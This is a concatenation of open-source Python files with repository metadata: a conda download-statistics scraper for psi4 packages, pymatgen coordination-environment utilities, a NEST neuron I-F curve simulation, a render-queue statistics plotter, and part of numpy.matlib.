{{% notebook {name}.ipynb cells[1:] %}}
""".format(**metadata)
# content = os.path.abspath(os.path.join(os.getcwd(), os.pardir, os.pardir, '{}.md'.format(name)))
# with open('{}'.format(content), 'w') as f:
# f.writelines(markdown)
# [Conda](http://conda.pydata.org/docs/intro.html) and
# [binstar](https://binstar.org/) are changing the packaging world of Python.
# Conda made it easy to install re-locatable python binaries that where hard
# to build, while binstar provides a "Linux repository-like system"
# (or if you are younger than me an AppStore-like system) to host custom binaries.
#
# Taking advantage of that [IOOS](http://www.ioos.noaa.gov/) created a binstar
# [channel](https://binstar.org/ioos) with Met-ocean themed packages for Windows,
# Linux and MacOS. Note that, if you are using Red Hat Enterprise Linux or Centos you
# should use the [rhel6 channel](https://binstar.org/ioos-rhel6) to avoid the
# [GLIBC problem](https://groups.google.com/a/continuum.io/forum/#!topic/conda/_MGxU8vOBPw).
#
# All the conda-recipes are open and kept in a GitHub
# [repository](https://github.com/ioos/conda-recipes). (And accepting PRs ;-)
#
# In this post I will not show how to install and configure conda with this channel.
# It has been done already [here](https://ocefpaf.github.io/python4oceanographers/blog/2014/06/23/virtual_env/)
# and
# [here](https://github.com/ioos/conda-recipes/wiki). Is this post I will scrape
# the binstar channel stats to evaluate how the channel is doing.
# First some handy functions to parse the dates, the package names, and
# to same all the data into a pandas DataFrame.
# In[2]:
import re
import requests
import numpy as np
from datetime import date
from pandas import DataFrame
from bs4 import BeautifulSoup
from dateutil.relativedelta import relativedelta
def todatetime(ul_str):
upload = re.compile(r'((?P<year>\d+) years?)?( and )?((?P<month>\d+) months?)?( and )?((?P<day>\d+) days?)?( and )?((?P<hour>\d+) hours?)?( and )?((?P<min>\d+) minutes?)?(.*)ago')
yr = mo = dy = hr = mn = 0
mobj = upload.match(ul_str)
if mobj:
if mobj.group('year'):
yr = int(mobj.group('year'))
if mobj.group('month'):
mo = int(mobj.group('month'))
if mobj.group('day'):
dy = int(mobj.group('day'))
if mobj.group('hour'):
hr = int(mobj.group('hour'))
if mobj.group('min'):
mn = int(mobj.group('min'))
else:
raise ValueError("Unexpected period {!r}".format(ul_str))
delta = relativedelta(years=yr, months=mo, days=dy, hours=hr, minutes=mn)
return date.today() - delta
def parse_name(cell):
name = cell.text.strip().split('/')
if len(name) != 2:
name = cell.text.strip().split('\\')
arch = '{}'.format(name[0].split()[1])
name = '{}'.format(name[1].split('.tar.bz2')[0])
return arch, name
def get_page(package, page):
url = "https://anaconda.org/psi4/{}/files?page={}".format
r = requests.get(url(package, page))
r.raise_for_status()
soup = BeautifulSoup(r.text, "html5lib")
table = soup.find("table", class_="full-width")
downloads, uploaded, platforms, names = [], [], [], []
for row in table.findAll('tr'):
col = row.findAll('td')
#print('COL: ', col)
if len(col) == 8:
downloads.append(int(col[6].text.strip()))
uploaded.append(todatetime(col[4].text.strip()))
platform, name = parse_name(col[3])
platforms.append(platform)
names.append(name)
#print downloads[-1], uploaded[-1], platforms[-1], names[-1]
return downloads, uploaded, platforms, names
def get_df(package):
downloads, uploaded, platforms, names = [], [], [], []
for page in range(1, 15):
dn, up, pf, nm = get_page(package, page)
print(len(nm), end=' ')
downloads.extend(dn)
uploaded.extend(up)
platforms.extend(pf)
names.extend(nm)
if len(nm) != 50:
break
else:
print("Insufficient pages or packages in multiple of 50 which may lead to inflated download counts.")
df = DataFrame(data=np.c_[platforms, names, uploaded, downloads],
columns=['platform', 'name', 'uploaded', 'downloads'])
df['uploaded'] = pd.to_datetime(df['uploaded'])
df.set_index('uploaded', inplace=True, drop=True)
df['downloads'] = df['downloads'].astype(int)
return df
# All the data we need is in the `repodata.json` file. There isn't an API
# to access that via the command line (yet), that is why we need to scrape
# it.
# In[3]:
from requests import HTTPError
from pandas import Panel, read_json
import pandas as pd
pd.set_option('display.max_columns', 500)
pd.set_option('display.max_rows', 5000)
pd.set_option('display.width', 1000)
json = "https://conda.anaconda.org/psi4/linux-64/repodata.json"
df = read_json(json)
packages = sorted(set(['-'.join(pac.split('-')[:-2]) for pac in df.index]))
packages = [pkg for pkg in packages if pkg]
packages = [u'psi4', u'chemps2', u'dftd3', u'pcmsolver', u'v2rdm_casscf', u'libint', u'erd', u'simint', u'dkh', u'gdma', u'gcp', u'libefp', 'libxc']
dfs = dict()
for pac in packages:
try:
print('\n', pac, ': ', end='')
dfs.update({pac: get_df(pac)})
except HTTPError:
continue
#print(dfs)
# Now let's split the various platforms and compute total number of downloads
# for each package.
# In[13]:
def get_plat_total(df):
package = dict()
for plat in ['linux-64', 'osx-64']: #, 'win-32', 'win-64']:
# all time
#sset = df.loc[:].query('platform == "{}"'.format(plat))
# before 1.0 # 5 Jul 2017 - no longer any good b/c I thinned out the pkgs
#sset = df.loc['2016-7-4':].query('platform == "{}"'.format(plat))
# after 1.0
#sset = df.loc[:'2016-7-4'].query('platform == "{}"'.format(plat))
# after 1.1
sset = df.loc[:'2017-5-16'].query('platform == "{}"'.format(plat))
print(sset) # nicely formatted output
total = sset.sum()
package.update({plat: total['downloads']})
return package
packages = dict()
for pac in dfs.keys():
df = dfs[pac]
packages.update({pac: get_plat_total(df)})
for pac in dfs.keys():
print('{:<15}: {:<10} {:<6} {:<10} {:<6} {:<10} {:<6}'.format(pac,
'linux-64', packages[pac]['linux-64'],
'osx-64', packages[pac]['osx-64'],
'total', packages[pac]['linux-64'] + packages[pac]['osx-64']))
| psi4/psi4meta | download-analysis/conda/anaconda_dot_org_scraper.py | Python | gpl-2.0 | 7,714 | [
"Psi4"
] | 616ec3c7651f8d3745453551b93ab9841f7bf90691e8d84c6d37a1e05ecfa919 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals
from pymatgen.ext.matproj import MPRester
from pymatgen.io.cif import CifParser
try:
import vtk
from pymatgen.vis.structure_vtk import StructureVis
no_vis = False
except ImportError:
StructureVis = None
no_vis = True
try:
input = raw_input
except NameError:
pass
from pymatgen.core.sites import PeriodicSite
import re
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import AllCoordinationGeometries
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometries import UNCLEAR_ENVIRONMENT_SYMBOL
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import LocalGeometryFinder
from pymatgen.analysis.chemenv.utils.chemenv_errors import NeighborsNotComputedChemenvError
from pymatgen.analysis.chemenv.coordination_environments.coordination_geometry_finder import AbstractGeometry
from pymatgen.analysis.chemenv.utils.coordination_geometry_utils import rotateCoords
from pymatgen.analysis.chemenv.utils.defs_utils import chemenv_citations
from pymatgen.analysis.chemenv.coordination_environments.chemenv_strategies import SimplestChemenvStrategy
from pymatgen.analysis.chemenv.coordination_environments.chemenv_strategies import SimpleAbundanceChemenvStrategy
from pymatgen.analysis.chemenv.coordination_environments.chemenv_strategies import TargettedPenaltiedAbundanceChemenvStrategy
from pymatgen.core.structure import Molecule
from collections import OrderedDict
import numpy as np
"""
This module contains some utils for the main script of the chemenv package.
"""
__author__ = "David Waroquiers"
__copyright__ = "Copyright 2012, The Materials Project"
__credits__ = "Geoffroy Hautier"
__version__ = "2.0"
__maintainer__ = "David Waroquiers"
__email__ = "david.waroquiers@gmail.com"
__date__ = "Feb 20, 2016"
strategies_class_lookup = OrderedDict()
strategies_class_lookup['SimplestChemenvStrategy'] = SimplestChemenvStrategy
strategies_class_lookup['SimpleAbundanceChemenvStrategy'] = SimpleAbundanceChemenvStrategy
strategies_class_lookup['TargettedPenaltiedAbundanceChemenvStrategy'] = TargettedPenaltiedAbundanceChemenvStrategy
def draw_cg(vis, site, neighbors, cg=None, perm=None, perfect2local_map=None,
show_perfect=False, csm_info=None, symmetry_measure_type='csm_wcs_ctwcc', perfect_radius=0.1,
show_distorted=True, faces_color_override=None):
if show_perfect:
if csm_info is None:
raise ValueError('Not possible to show perfect environment without csm_info')
csm_suffix = symmetry_measure_type[4:]
perf_radius = (perfect_radius - 0.2) / 0.002
if perm is not None and perfect2local_map is not None:
raise ValueError('Only "perm" or "perfect2local_map" should be provided in draw_cg, not both')
if show_distorted:
vis.add_bonds(neighbors, site)
for n in neighbors:
vis.add_site(n)
if len(neighbors) < 3:
if show_distorted:
vis.add_bonds(neighbors, site, color=[0.0, 1.0, 0.0], opacity=0.4, radius=0.175)
if show_perfect:
if len(neighbors) == 2:
perfect_geometry = AbstractGeometry.from_cg(cg)
trans = csm_info['other_symmetry_measures']['translation_vector_{}'.format(csm_suffix)]
rot = csm_info['other_symmetry_measures']['rotation_matrix_{}'.format(csm_suffix)]
scale = csm_info['other_symmetry_measures']['scaling_factor_{}'.format(csm_suffix)]
points = perfect_geometry.points_wcs_ctwcc()
rotated_points = rotateCoords(points, rot)
points = [scale * pp + trans for pp in rotated_points]
if 'wcs' in csm_suffix:
ef_points = points[1:]
else:
ef_points = points
edges = cg.edges(ef_points, input='coords')
vis.add_edges(edges, color=[1.0, 0.0, 0.0])
for point in points:
vis.add_partial_sphere(coords=point, radius=perf_radius, color=[0.0, 0.0, 0.0],
start=0, end=360, opacity=1)
else:
if show_distorted:
if perm is not None:
faces = cg.faces(neighbors, permutation=perm)
edges = cg.edges(neighbors, permutation=perm)
elif perfect2local_map is not None:
faces = cg.faces(neighbors, perfect2local_map=perfect2local_map)
edges = cg.edges(neighbors, perfect2local_map=perfect2local_map)
else:
faces = cg.faces(neighbors)
edges = cg.edges(neighbors)
symbol = list(site.species_and_occu.keys())[0].symbol
if faces_color_override:
mycolor = faces_color_override
else:
mycolor = [float(i) / 255 for i in vis.el_color_mapping[symbol]]
vis.add_faces(faces, mycolor, opacity=0.4)
vis.add_edges(edges)
if show_perfect:
perfect_geometry = AbstractGeometry.from_cg(cg)
trans = csm_info['other_symmetry_measures']['translation_vector_{}'.format(csm_suffix)]
rot = csm_info['other_symmetry_measures']['rotation_matrix_{}'.format(csm_suffix)]
scale = csm_info['other_symmetry_measures']['scaling_factor_{}'.format(csm_suffix)]
points = perfect_geometry.points_wcs_ctwcc()
rotated_points = rotateCoords(points, rot)
points = [scale*pp + trans for pp in rotated_points]
if 'wcs' in csm_suffix:
ef_points = points[1:]
else:
ef_points = points
edges = cg.edges(ef_points, input='coords')
vis.add_edges(edges, color=[1.0, 0.0, 0.0])
for point in points:
vis.add_partial_sphere(coords=point, radius=perf_radius, color=[0.0, 0.0, 0.0],
start=0, end=360, opacity=1)
# Visualizing a coordination geometry
def visualize(cg, zoom=None, vis=None, myfactor=1.0, view_index=True, faces_color_override=None):
if vis is None:
vis = StructureVis(show_polyhedron=False, show_unit_cell=False)
myspecies = ["O"] * (cg.coordination_number+1)
myspecies[0] = "Cu"
coords = [np.zeros(3, np.float) + cg.central_site]
for pp in cg.points:
coords.append(np.array(pp) + cg.central_site)
coords = [cc * myfactor for cc in coords]
structure = Molecule(species=myspecies, coords=coords)
vis.set_structure(structure=structure, reset_camera=True)
# neighbors_list = coords[1:]
draw_cg(vis, site=structure[0], neighbors=structure[1:], cg=cg, faces_color_override=faces_color_override)
if view_index:
for ineighbor, neighbor in enumerate(structure[1:]):
vis.add_text(neighbor.coords, '{}'.format(ineighbor), color=(0, 0, 0))
if zoom is not None:
vis.zoom(zoom)
return vis
def welcome(chemenv_config):
print('Chemical Environment package (ChemEnv)')
print(chemenv_citations())
print(chemenv_config.package_options_description())
def thankyou():
print('Thank you for using the ChemEnv package')
print(chemenv_citations())
def compute_environments(chemenv_configuration):
string_sources = {'cif': {'string': 'a Cif file', 'regexp': '.*\.cif$'},
'mp': {'string': 'the Materials Project database', 'regexp': 'mp-[0-9]+$'}}
questions = {'c': 'cif'}
if chemenv_configuration.has_materials_project_access:
questions['m'] = 'mp'
lgf = LocalGeometryFinder()
lgf.setup_parameters()
allcg = AllCoordinationGeometries()
strategy_class = strategies_class_lookup[chemenv_configuration.package_options['default_strategy']['strategy']]
#TODO: Add the possibility to change the parameters and save them in the chemenv_configuration
default_strategy = strategy_class()
default_strategy.setup_options(chemenv_configuration.package_options['default_strategy']['strategy_options'])
max_dist_factor = chemenv_configuration.package_options['default_max_distance_factor']
firsttime = True
while True:
if len(questions) > 1:
found = False
print('Enter the source from which the structure is coming or <q> to quit :')
for key_character, qq in questions.items():
print(' - <{}> for a structure from {}'.format(key_character, string_sources[qq]['string']))
test = input(' ... ')
if test == 'q':
break
if test not in list(questions.keys()):
for key_character, qq in questions.items():
if re.match(string_sources[qq]['regexp'], str(test)) is not None:
found = True
source_type = qq
if not found:
print('Wrong key, try again ...')
continue
else:
source_type = questions[test]
else:
found = False
source_type = list(questions.values())[0]
if found and len(questions) > 1:
input_source = test
if source_type == 'cif':
if not found:
input_source = input('Enter path to cif file : ')
cp = CifParser(input_source)
structure = cp.get_structures()[0]
elif source_type == 'mp':
if not found:
input_source = input('Enter materials project id (e.g. "mp-1902") : ')
a = MPRester()
structure = a.get_structure_by_material_id(input_source)
lgf.setup_structure(structure)
print('Computing environments for {} ... '.format(structure.composition.reduced_formula))
se = lgf.compute_structure_environments(maximum_distance_factor=max_dist_factor)
print('Computing environments finished')
while True:
test = input('See list of environments determined for each (unequivalent) site ? '
'("y" or "n", "d" with details, "g" to see the grid) : ')
strategy = default_strategy
if test in ['y', 'd', 'g']:
strategy.set_structure_environments(se)
for eqslist in se.equivalent_sites:
site = eqslist[0]
isite = se.structure.index(site)
try:
if strategy.uniquely_determines_coordination_environments:
ces = strategy.get_site_coordination_environments(site)
else:
ces = strategy.get_site_coordination_environments_fractions(site)
except NeighborsNotComputedChemenvError:
continue
if ces is None:
continue
if len(ces) == 0:
continue
comp = site.species_and_occu
#ce = strategy.get_site_coordination_environment(site)
if strategy.uniquely_determines_coordination_environments:
ce = ces[0]
if ce is None:
continue
thecg = allcg.get_geometry_from_mp_symbol(ce[0])
mystring = 'Environment for site #{} {} ({}) : {} ({})\n'.format(str(isite),
comp.get_reduced_formula_and_factor()[0],
str(comp),
thecg.name,
ce[0])
else:
mystring = 'Environments for site #{} {} ({}) : \n'.format(str(isite),
comp.get_reduced_formula_and_factor()[0],
str(comp))
for ce in ces:
cg = allcg.get_geometry_from_mp_symbol(ce[0])
csm = ce[1]['other_symmetry_measures']['csm_wcs_ctwcc']
mystring += ' - {} ({}): {:.2f} % (csm : {:2f})\n'.format(cg.name, cg.mp_symbol,
100.0*ce[2],
csm)
if test in ['d', 'g'] and strategy.uniquely_determines_coordination_environments:
if thecg.mp_symbol != UNCLEAR_ENVIRONMENT_SYMBOL:
mystring += ' <Continuous symmetry measures> '
mingeoms = se.ce_list[isite][thecg.coordination_number][0].minimum_geometries()
for mingeom in mingeoms:
csm = mingeom[1]['other_symmetry_measures']['csm_wcs_ctwcc']
mystring += '{} : {:.2f} '.format(mingeom[0], csm)
print(mystring)
if test == 'g':
test = input('Enter index of site(s) for which you want to see the grid of parameters : ')
indices = list(map(int, test.split()))
print(indices)
for isite in indices:
se.plot_environments(isite, additional_condition=se.AC.ONLY_ACB)
if no_vis:
test = input('Go to next structure ? ("y" to do so)')
if test == 'y':
break
continue
test = input('View structure with environments ? ("y" for the unit cell or "m" for a supercell or "n") : ')
if test in ['y', 'm']:
if test == 'm':
mydeltas = []
test = input('Enter multiplicity (e.g. 3 2 2) : ')
nns = test.split()
for i0 in range(int(nns[0])):
for i1 in range(int(nns[1])):
for i2 in range(int(nns[2])):
mydeltas.append(np.array([1.0*i0, 1.0*i1, 1.0*i2], np.float))
else:
mydeltas = [np.zeros(3, np.float)]
if firsttime:
vis = StructureVis(show_polyhedron=False, show_unit_cell=True)
vis.show_help = False
firsttime = False
vis.set_structure(se.structure)
strategy.set_structure_environments(se)
for isite, site in enumerate(se.structure):
try:
ces = strategy.get_site_coordination_environments(site)
except NeighborsNotComputedChemenvError:
continue
if len(ces) == 0:
continue
ce = strategy.get_site_coordination_environment(site)
if ce is not None and ce[0] != UNCLEAR_ENVIRONMENT_SYMBOL:
for mydelta in mydeltas:
psite = PeriodicSite(site._species, site._fcoords + mydelta, site._lattice,
properties=site._properties)
vis.add_site(psite)
neighbors = strategy.get_site_neighbors(psite)
draw_cg(vis, psite, neighbors, cg=lgf.allcg.get_geometry_from_mp_symbol(ce[0]),
perm=ce[1]['permutation'])
vis.show()
test = input('Go to next structure ? ("y" to do so) : ')
if test == 'y':
break
print('')
| Bismarrck/pymatgen | pymatgen/analysis/chemenv/utils/scripts_utils.py | Python | mit | 16,162 | [
"VTK",
"pymatgen"
] | 9b0e8d4b79d9cbab4f90158b20801a9f40f1e47303d1f0b5dd1ae0ead70b40fe |
# -*- coding: utf-8 -*-
#
# if_curve.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""IF curve example
----------------------
This example illustrates how to measure the I-F curve of a neuron.
The program creates a small group of neurons and injects a noisy current
:math:`I(t) = I_mean + I_std*W(t)`
where :math:`W(t)` is a white noise process.
The programm systematically drives the current through a series of values in
the two-dimensional `(I_mean, I_std)` space and measures the firing rate of
the neurons.
In this example, we measure the I-F curve of the adaptive exponential
integrate and fire neuron (``aeif_cond_exp``), but any other neuron model that
accepts current inputs is possible. The model and its parameters are
supplied when the IF_curve object is created.
"""
import numpy
import nest
import shelve
###############################################################################
# Here we define which model and the neuron parameters to use for measuring
# the transfer function.
model = 'aeif_cond_exp'
params = {'a': 4.0,
'b': 80.8,
'V_th': -50.4,
'Delta_T': 2.0,
'I_e': 0.0,
'C_m': 281.0,
'g_L': 30.0,
'V_reset': -70.6,
'tau_w': 144.0,
't_ref': 5.0,
'V_peak': -40.0,
'E_L': -70.6,
'E_ex': 0.,
'E_in': -70.}
class IF_curve():
t_inter_trial = 200. # Interval between two successive measurement trials
t_sim = 1000. # Duration of a measurement trial
n_neurons = 100 # Number of neurons
n_threads = 4 # Nubmer of threads to run the simulation
def __init__(self, model, params=False):
self.model = model
self.params = params
self.build()
self.connect()
def build(self):
#######################################################################
# We reset NEST to delete information from previous simulations
# and adjust the number of threads.
nest.ResetKernel()
nest.SetKernelStatus({'local_num_threads': self.n_threads})
#######################################################################
# We set the default parameters of the neuron model to those
# defined above and create neurons and devices.
if self.params:
nest.SetDefaults(self.model, self.params)
self.neuron = nest.Create(self.model, self.n_neurons)
self.noise = nest.Create('noise_generator')
self.spike_recorder = nest.Create('spike_recorder')
def connect(self):
#######################################################################
# We connect the noisy current to the neurons and the neurons to
# the spike recorders.
nest.Connect(self.noise, self.neuron, 'all_to_all')
nest.Connect(self.neuron, self.spike_recorder, 'all_to_all')
def output_rate(self, mean, std):
self.build()
self.connect()
#######################################################################
# We adjust the parameters of the noise according to the current
# values.
self.noise.set(mean=mean, std=std, start=0.0, stop=1000., origin=0.)
# We simulate the network and calculate the rate.
nest.Simulate(self.t_sim)
rate = self.spike_recorder.n_events * 1000. / (1. * self.n_neurons * self.t_sim)
return rate
def compute_transfer(self, i_mean=(400.0, 900.0, 50.0),
i_std=(0.0, 600.0, 50.0)):
#######################################################################
# We loop through all possible combinations of `(I_mean, I_sigma)`
# and measure the output rate of the neuron.
self.i_range = numpy.arange(*i_mean)
self.std_range = numpy.arange(*i_std)
self.rate = numpy.zeros((self.i_range.size, self.std_range.size))
nest.set_verbosity('M_WARNING')
for n, i in enumerate(self.i_range):
print('I = {0}'.format(i))
for m, std in enumerate(self.std_range):
self.rate[n, m] = self.output_rate(i, std)
transfer = IF_curve(model, params)
transfer.compute_transfer()
###############################################################################
# After the simulation is finished, we store the data into a file for
# later analysis.
with shelve.open(model + '_transfer.dat') as dat:
dat['I_mean'] = transfer.i_range
dat['I_std'] = transfer.std_range
dat['rate'] = transfer.rate
| stinebuu/nest-simulator | pynest/examples/if_curve.py | Python | gpl-2.0 | 5,196 | [
"NEURON"
] | 716db44925ea318ae7954f3acf41fa351645576d1242300083257b670d2caa2a |
# -*- coding: utf8 -*-
"""
"""
__author__ = "Jérôme Samson"
__copyright__ = "Copyright 2014, Mikros Image"
import os
import sys
import csv
import time
import datetime
from optparse import OptionParser
import numpy as np
import pygal
from pygal.style import *
try:
import simplejson as json
except ImportError:
import json
from octopus.dispatcher import settings
from octopus.core import singletonconfig
from pulitools.common import roundTime
from pulitools.common import lowerQuartile, higherQuartile
from pulitools.stats.common import createCommonParser, getRangeDates, prepareGraph, prepareScale, renderGraph
###########################################################################################################################
# Data example:
# {
# "prod":{
# "ddd" : { "jobs":15, "err":1, "paused":2, "ready/blocked":10, "running":2, "allocatedRN":5, "readyCommandCount":15},
# "dior_tea" : { "jobs":1, "err":0, "paused":0, "ready/blocked":0, "running":1, "allocatedRN":1, "readyCommandCount":15},
# },
# "user":{
# "brr" : { "jobs":15, "err":1, "paused":2, "ready/blocked":10, "running":2 , "allocatedRN":5, "readyCommandCount":15},
# "bho" : { "jobs":1, "err":0, "paused":0, "ready/blocked":0, "running":1 , "allocatedRN":1, "readyCommandCount":15},
# "lap" : { "jobs":1, "err":0, "paused":0, "ready/blocked":0, "running":1 , "allocatedRN":1, "readyCommandCount":15},
# },
# "step":{
# ...
# },
# "type":{
# ...
# },
# "total": { "jobs":15, "err":1, "paused":2, "ready/blocked":10, "running":2 , "allocatedRN":5, "readyCommandCount":150}
# "requestDate": "Wed Apr 2 12:16:01 2014"
# }
if __name__ == "__main__":
# # DBG
# startTime = time.time()
# prevTime = time.time()
# print ("%s - init timer" % (datetime.datetime.now()))
options, args = createCommonParser().parse_args()
if options.verbose:
print "Command options: %s" % options
print "Command arguments: %s" % args
if len(args) is not 2:
print "Error: 2 fields must be specified."
sys.exit(1)
else:
groupField = args[0]
graphValue = args[1]
startDate, endDate = getRangeDates( options )
if options.verbose:
print "Loading stats: %r " % options.sourceFile
print " - from: %r " % datetime.date.fromtimestamp(startDate)
print " - to: %r " % datetime.date.fromtimestamp(endDate)
print "Start."
strScale=[]
scale=[]
data2Dim = {}
log = []
#
# Load json log and filter by date
# Optim done to have a fast dataset:
# - read the whole file without parsing
# - read resulting list in reversed order and parse each json line (mandatory due to the log format)
# - filter and add data in range
# - once we reached data too old: break the loop
with open(options.sourceFile, "r" ) as f:
raw_str = f.readlines()
# print "%s - %6.2f ms - load raw source complete, num lines: %d" % (datetime.datetime.now(), (time.time() - prevTime) * 1000,len(raw_str))
# prevTime = time.time()
# for line in reversed(raw_str):
# date = float(re.search('"requestDate":(.+?),', line).group(1))
# if (startDate < date and date <= endDate):
# log.insert( 0, json.loads(line) )
# if date < startDate:
# break
for line in reversed(raw_str):
data = json.loads(line)
if (startDate < data['requestDate'] and data['requestDate'] <= endDate):
log.insert( 0, data )
# We read by the end, if date is too old, no need to continue the parsing
if data['requestDate'] < startDate:
break
# print "%s - %6.2f ms - load source complete, num lines: %d" % (datetime.datetime.now(), (time.time() - prevTime) * 1000, len(log))
# prevTime = time.time()
for i, data in enumerate(log):
eventDate = datetime.datetime.fromtimestamp( data['requestDate'] )
for key, val in data[ groupField ].items():
if key not in data2Dim:
data2Dim[key] = np.array( [0]*len(log) )
data2Dim[key][i] = val[ graphValue ]
scale.append( eventDate )
# print "%s - %6.2f ms - create tables" % (datetime.datetime.now(), (time.time() - prevTime) * 1000)
# prevTime = time.time()
stepSize = len(scale) / options.resolution
newshape = (options.resolution, stepSize)
useableSize = len(scale) - ( len(scale) % options.resolution )
avgData = {}
if options.verbose:
print "stepSize=%d" % stepSize
print "useableSize=%d" % useableSize
for dataset in data2Dim.keys():
# print "%s = %d - %r" % (dataset, len(data2Dim[dataset]), data2Dim[dataset])
avgData[dataset] = np.mean( np.reshape(data2Dim[dataset][-useableSize:], newshape), axis=1)
# print "%s - %6.2f ms - create avg data" % (datetime.datetime.now(), (time.time() - prevTime) * 1000)
# prevTime = time.time()
# working = np.array(nb_working[-useableSize:])
# unknown = np.array(nb_unknown[-useableSize:])
# paused = np.array(nb_paused[-useableSize:])
# # print ("working %d = %r" % (len(working), working) )
# # print ("reshape %d = %r" % (len(newshape), newshape) )
# avg_working= np.mean( np.reshape(working, newshape), axis=1)
# avg_paused= np.mean( np.reshape(paused, newshape), axis=1)
# avg_unknown= np.mean( np.reshape(unknown, newshape), axis=1)
# # med= np.median(data, axis=1)
# # amin= np.min(data, axis=1)
# # amax= np.max(data, axis=1)
# # q1= lowerQuartile(data)
# # q2= higherQuartile(data)
# # std= np.std(data, axis=1)
# strScale = [''] * options.resolution
#
# Prepare scale
#
tmpscale = np.reshape(scale[-useableSize:], newshape)
strScale = prepareScale( tmpscale, options )
if options.verbose:
print ("newshape %d = %r" % (len(newshape), newshape) )
print ("data2Dim %d = %r" % (len(data2Dim), data2Dim) )
print ("scale %d = %r" % (len(strScale), strScale) )
if options.verbose:
print "Num events: %d" % len(scale)
print "Creating graph."
avg_usage = prepareGraph( options )
avg_usage.title = options.title
avg_usage.x_labels = strScale
for key,val in avgData.items():
avg_usage.add(key, val )
# print "%s - %6.2f ms - prepare graph" % (datetime.datetime.now(), (time.time() - prevTime) * 1000)
# prevTime = time.time()
renderGraph( avg_usage, options )
# print "%s - %6.2f ms - render graph" % (datetime.datetime.now(), (time.time() - prevTime) * 1000)
# print "%s - %6.2f ms - Total time" % (datetime.datetime.now(), (time.time() - startTime) * 1000)
if options.verbose:
print "Done."
| mikrosimage/OpenRenderManagement | src/pulitools/stats/trace_queue_2dim.py | Python | bsd-3-clause | 6,873 | [
"Octopus"
] | 8a05610bf8e85653066e28b5e189e6375976470f77c67c06da6f335b0a317005 |
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.matrixlib.defmatrix import matrix, asmatrix
# need * as we're copying the numpy namespace
from numpy import *
__version__ = np.__version__
__all__ = np.__all__[:] # copy numpy namespace
__all__ += ['rand', 'randn', 'repmat']
def empty(shape, dtype=None, order='C'):
"""Return a new matrix of given shape and type, without initializing entries.
Parameters
----------
shape : int or tuple of int
Shape of the empty matrix.
dtype : data-type, optional
Desired output data-type.
order : {'C', 'F'}, optional
Whether to store multi-dimensional data in row-major
(C-style) or column-major (Fortran-style) order in
memory.
See Also
--------
empty_like, zeros
Notes
-----
`empty`, unlike `zeros`, does not set the matrix values to zero,
and may therefore be marginally faster. On the other hand, it requires
the user to manually set all the values in the array, and should be
used with caution.
Examples
--------
>>> import numpy.matlib
>>> np.matlib.empty((2, 2)) # filled with random data
matrix([[ 6.76425276e-320, 9.79033856e-307], # random
[ 7.39337286e-309, 3.22135945e-309]])
>>> np.matlib.empty((2, 2), dtype=int)
matrix([[ 6600475, 0], # random
[ 6586976, 22740995]])
"""
return ndarray.__new__(matrix, shape, dtype, order=order)
def ones(shape, dtype=None, order='C'):
"""
Matrix of ones.
Return a matrix of given shape and type, filled with ones.
Parameters
----------
shape : {sequence of ints, int}
Shape of the matrix
dtype : data-type, optional
The desired data-type for the matrix, default is np.float64.
order : {'C', 'F'}, optional
Whether to store matrix in C- or Fortran-contiguous order,
default is 'C'.
Returns
-------
out : matrix
Matrix of ones of given shape, dtype, and order.
See Also
--------
ones : Array of ones.
matlib.zeros : Zero matrix.
Notes
-----
If `shape` has length one i.e. ``(N,)``, or is a scalar ``N``,
`out` becomes a single row matrix of shape ``(1,N)``.
Examples
--------
>>> np.matlib.ones((2,3))
matrix([[1., 1., 1.],
[1., 1., 1.]])
>>> np.matlib.ones(2)
matrix([[1., 1.]])
"""
a = ndarray.__new__(matrix, shape, dtype, order=order)
a.fill(1)
return a
def zeros(shape, dtype=None, order='C'):
"""
Return a matrix of given shape and type, filled with zeros.
Parameters
----------
shape : int or sequence of ints
Shape of the matrix
dtype : data-type, optional
The desired data-type for the matrix, default is float.
order : {'C', 'F'}, optional
Whether to store the result in C- or Fortran-contiguous order,
default is 'C'.
Returns
-------
out : matrix
Zero matrix of given shape, dtype, and order.
See Also
--------
numpy.zeros : Equivalent array function.
matlib.ones : Return a matrix of ones.
Notes
-----
If `shape` has length one i.e. ``(N,)``, or is a scalar ``N``,
`out` becomes a single row matrix of shape ``(1,N)``.
Examples
--------
>>> import numpy.matlib
>>> np.matlib.zeros((2, 3))
matrix([[0., 0., 0.],
[0., 0., 0.]])
>>> np.matlib.zeros(2)
matrix([[0., 0.]])
"""
a = ndarray.__new__(matrix, shape, dtype, order=order)
a.fill(0)
return a
def identity(n,dtype=None):
"""
Returns the square identity matrix of given size.
Parameters
----------
n : int
Size of the returned identity matrix.
dtype : data-type, optional
Data-type of the output. Defaults to ``float``.
Returns
-------
out : matrix
`n` x `n` matrix with its main diagonal set to one,
and all other elements zero.
See Also
--------
numpy.identity : Equivalent array function.
matlib.eye : More general matrix identity function.
Examples
--------
>>> import numpy.matlib
>>> np.matlib.identity(3, dtype=int)
matrix([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
"""
a = array([1]+n*[0], dtype=dtype)
b = empty((n, n), dtype=dtype)
b.flat = a
return b
def eye(n,M=None, k=0, dtype=float, order='C'):
"""
Return a matrix with ones on the diagonal and zeros elsewhere.
Parameters
----------
n : int
Number of rows in the output.
M : int, optional
Number of columns in the output, defaults to `n`.
k : int, optional
Index of the diagonal: 0 refers to the main diagonal,
a positive value refers to an upper diagonal,
and a negative value to a lower diagonal.
dtype : dtype, optional
Data-type of the returned matrix.
order : {'C', 'F'}, optional
Whether the output should be stored in row-major (C-style) or
column-major (Fortran-style) order in memory.
.. versionadded:: 1.14.0
Returns
-------
I : matrix
A `n` x `M` matrix where all elements are equal to zero,
except for the `k`-th diagonal, whose values are equal to one.
See Also
--------
numpy.eye : Equivalent array function.
